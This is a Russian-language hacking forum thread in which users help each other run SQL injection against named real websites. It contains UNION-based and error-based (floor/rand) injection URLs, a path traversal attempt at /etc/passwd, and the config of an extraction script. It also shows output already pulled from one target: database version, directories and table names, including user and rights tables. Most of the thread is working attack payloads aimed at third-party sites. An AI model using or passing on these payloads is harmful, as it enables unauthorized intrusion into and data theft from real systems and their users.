Pashkela как ты обошел фильтрацию, чтобы вытянуть это: user(): [email protected] database(): lavozi_lavozindependiente_com_-_db version(): 5.1.44 http://www.lavozindependiente.com/microsite.php?cha=66+order+by+3+--+ http://www.lavozindependiente.com/microsite.php?cha=-66+union+select+1,2,3+--+ Я пробовал, у меня не получается.
Ну там же явно написано, крутил как слепую, по правилам (классическим) blind sql injection, для получения системной информации не требуется ни union, ни select
https://forum.antichat.ru/thread40576.html https://forum.antichat.ru/thread162060.html https://forum.antichat.ru/thread161670.html
2daniel_1024 http://www.ruraldoc.com.au/content_sub.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),4,5,6--
Я вижу запрос в адресную строку типа: http://mihadmin.ru/statpage.php?sid=love Подставляю вместо нее другой запрос: http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd На что система мне выдает: http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой. Но если пытаюсь работать боле глубже http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться Вообщем, если ли тут иньекция? Инклуд или скуль?
Code: http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+count(0),concat((select(version())),floor(rand(0)*2))from(statpage)+group+by+2)a)--+ ))
Понял. Тогда почему используется функция (select(1)from(select+count(0),concat((select(version())),floor(rand(0)*2 ))from(statpage)+group+by+2)a)--+ Кодирование это понятно, только почему в такой последовательности и "--+" - какое имеет значение для уязвимого запроса?
Понятно. Я хочу выяснить наименование столбцов и полей. По типу: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 -- : Произвожу иньекцию, подобно этой: http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+count(0),concat((select(TABLE_NAME)),floor(rand(0)*2))from(statpage)+FROM +INFORMATION_SCHEMA.TABLES+LIMIT+1,1)a)--+ Я не совсем понимаю механизм заключения все в concat и floor Существует какой-то онлайн сервис или программа для преобразования? Как с его помощью можно вытащить названия таблиц, полей?
тыцк Code: $method = 0; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET $f_table = "statpage"; $f_url = "http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from"; # url $f_plus = "+"; # $f_filtr = "a)--+"; Code: System information: ----------------------------------------- ver:5.0.51a-24+lenny2 datadir:/var/lib/mysql/ os:debian-linux-gnu base:mihadmin_main basedir:/usr/ tmpdir:/tmp ----------------------------------------- Tables in information_schema.tables - 27 ----------------------------------------- COLLATIONS ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES article const group group_refer menu rights statpage CHARACTER_SETS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS news rights_refer user
